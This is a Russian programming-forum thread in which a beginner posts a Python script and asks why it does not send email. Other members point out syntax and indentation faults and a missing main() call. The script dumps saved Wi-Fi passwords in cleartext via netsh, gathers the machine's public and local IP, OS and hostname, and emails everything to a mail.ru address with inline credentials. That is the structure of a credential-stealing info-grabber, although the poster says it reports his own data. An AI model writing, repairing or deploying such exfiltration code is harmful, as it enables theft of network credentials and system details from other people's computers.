Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > IT форум > Помощь студентам
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 23.11.2020, 18:09   #1
Todd89
Новичок
Джуниор
 
Регистрация: 23.11.2020
Сообщений: 4
По умолчанию Помогите найти ошибку

Код:
import subprocess as sp
from xml.dom import minidom
import requests
from time import sleep
import platform as pf
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import socket

sp.call( 'netsh wlan show  profile' )
sp.call( 'netsh wlan export profile folder=C:\\ key =clear' )

sleep( 2 )

def wifi_parse():
	doc = minidom.parse( '\\Беспроводная сеть-OnLime40.xml' )

	wifi_name = doc.getElementsByTagName( 'name' )
	wifi_password = doc.getElementsByTagName( 'keyMaterial' )

	global data
	data = f'Wi-Fi name : { wifi_name }\nWi-Fi password : { wifi_password }'

def get_ip():
	response = requests.get( 'http://myip.dnsomatic.com' )
	
	ip = response.text

	global data_ip
	data_ip = f'IP ADDRESS : { ip }'

def info_pc():
    processor = pf.processor()
    name_sys = pf.system() + ' ' + pf.release()	
    net_pc = pf.node()
    ip_pc = socket.gethostbyname( socket.gethostname() )

    global data_pc
    data_pc = f'''
    Процессор : { processor }\n
    Система : { name_sys }\n
    Сетевое имя ПК : { net_pc }\n
    IP ADDRESS ПК : { ip_pc }\n
    '''

def all_info():
    global data_all_info
    data_all_info = f'{ data }\n{ data_ip }\n{ data_pc }'

def send_mail():
    msg = MIMEMultipart()

    msg[ 'Subject' ] = 'info of PC'       
    msg[ 'from' ] = 'yury8989@mail.ru'
    body = data_all_info
    msg.attach( MIMEText( body, 'plain' ) )

    server = smtplib.SMTP_SSL( 'smtp.mail.ru' 465 )

    server.login( 3rtyg, Marionetka95 )
    server.sendmail( 3rtyg, 'yury8989@mail.ru, msg.as_string() )
    server.quit()

def main():    
    wifi_parse()
    get_ip()
    info_pc()
    all_info()
    send_mail()

Последний раз редактировалось BDA; 24.11.2020 в 01:33.
Todd89 вне форума Ответить с цитированием
Старый 23.11.2020, 20:07   #2
ViktorR
Старожил
 
Регистрация: 23.10.2010
Сообщений: 2,306
По умолчанию

Да у тебя тут весь текст - сплошная ошибка.
В Pyton очень важны отступы.
Почитай как оформлять код на форуме.

А экстрасенсов тут не замечали уже давно.
Как-то так, ...
ViktorR вне форума Ответить с цитированием
Старый 23.11.2020, 22:59   #3
WorldMaster
Старожил
 
Аватар для WorldMaster
 
Регистрация: 25.08.2011
Сообщений: 2,841
По умолчанию

Что за ошибка?? Как проявляет себя?? Студни в край обленились.
Выкинуть код на форум и пусть там все ломают голову что там в нем не так?? Тут кто то чтото обязан чтоли делать?? Или студни думают что на форуме сидят люди которые как на работу сюда ходят и только и ждут когда придет очередной заказчик с темой "Все сломалось, живо решайте, плебеи".
Skype - wmaster_s E-Mail - WorldMasters@gmail.com
Работаем по 3 критериям - быстро, качественно, недорого. Заказчик выбирает любые два.
WorldMaster вне форума Ответить с цитированием
Старый 24.11.2020, 00:51   #4
Todd89
Новичок
Джуниор
 
Регистрация: 23.11.2020
Сообщений: 4
По умолчанию

Благодарю за совет об отступах.

По поводу обленились..
Пытаюсь изучить язык своими силами,не хрена не понимаю и не знаю.
Извиняюсь если принес Вам какой-то дискомфорт.Ищу инфу везде,полезной и качественной крайне мало,прошу сильно не судить,это не лень,это тупость
Todd89 вне форума Ответить с цитированием
Старый 24.11.2020, 10:32   #5
ViktorR
Старожил
 
Регистрация: 23.10.2010
Сообщений: 2,306
По умолчанию

Осталось немного.
1. У тебя определены функции, но нет вызова главной.
Что-то вроде такого:
Код:
if __name__ == "__main__":
    main()
2. А в чём собственно ошибка?
Что выдаёт интерпретатор?
Как-то так, ...
ViktorR вне форума Ответить с цитированием
Старый 24.11.2020, 10:36   #6
WorldMaster
Старожил
 
Аватар для WorldMaster
 
Регистрация: 25.08.2011
Сообщений: 2,841
По умолчанию

Цитата:
Сообщение от ViktorR Посмотреть сообщение
2. А в чём собственно ошибка?
Что выдаёт интерпретатор?
Все надо клещами тащить из ТС под пытками.
Skype - wmaster_s E-Mail - WorldMasters@gmail.com
Работаем по 3 критериям - быстро, качественно, недорого. Заказчик выбирает любые два.
WorldMaster вне форума Ответить с цитированием
Старый 24.11.2020, 15:37   #7
Todd89
Новичок
Джуниор
 
Регистрация: 23.11.2020
Сообщений: 4
По умолчанию

2. А в чём собственно ошибка?
Что выдаёт интерпретатор?[/QUOTE]


Не выдает ни чего,просто не шлет информацию на почту,почему не пойму
Todd89 вне форума Ответить с цитированием
Старый 24.11.2020, 15:43   #8
FrosyaZZ
Форумчанин
 
Регистрация: 16.11.2020
Сообщений: 243
По умолчанию

Код:
smtplib.SMTP_SSL( 'smtp.mail.ru' 465 )
А где запятая между параметрами?
FrosyaZZ вне форума Ответить с цитированием
Старый 24.11.2020, 16:12   #9
Todd89
Новичок
Джуниор
 
Регистрация: 23.11.2020
Сообщений: 4
По умолчанию

Цитата:
Сообщение от FrosyaZZ Посмотреть сообщение
Код:
smtplib.SMTP_SSL( 'smtp.mail.ru' 465 )
А где запятая между параметрами?
исправил.Данный код должен высылать мне на почту мой ip,версию пк,пароль от Wifi.
Todd89 вне форума Ответить с цитированием
Старый 24.11.2020, 16:13   #10
FrosyaZZ
Форумчанин
 
Регистрация: 16.11.2020
Сообщений: 243
По умолчанию

Исправляйте дальше
Код:
server.sendmail( 3rtyg, 'yury8989@mail.ru, msg.as_string() )
Даже по форматированию видно, что что-то не так.
FrosyaZZ вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[C++] найти сумму ряда , посчитать функцию ch(x) и найти абсолютную и относительную погрешности. Помогите найти ошибку! Vladonna Помощь студентам 2 13.09.2018 22:07
Помогите, пожалуйста, найти ошибку в коде (найти сумму факториалов чётных чисел в заданном диапазоне) kris14 Паскаль, Turbo Pascal, PascalABC.NET 8 25.10.2017 15:42
Дан массив а(n) типа SWORD. найти сумму всех отрицательных элементов массива.помогите найти ошибку Юлия123456 Assembler - Ассемблер (FASM, MASM, WASM, NASM, GoASM, Gas, RosAsm, HLA) и не рекомендуем TASM 2 07.09.2016 06:12
Найти седловые точки в матрице(помогите найти ошибку) - pascal tdsotm Помощь студентам 0 20.11.2014 18:57
Помогите найти ошибку - StrToFloat выдаёт ошибку EConvertError для ячеек StringGrid (Delphi) Artsiom Помощь студентам 10 18.12.2013 14:10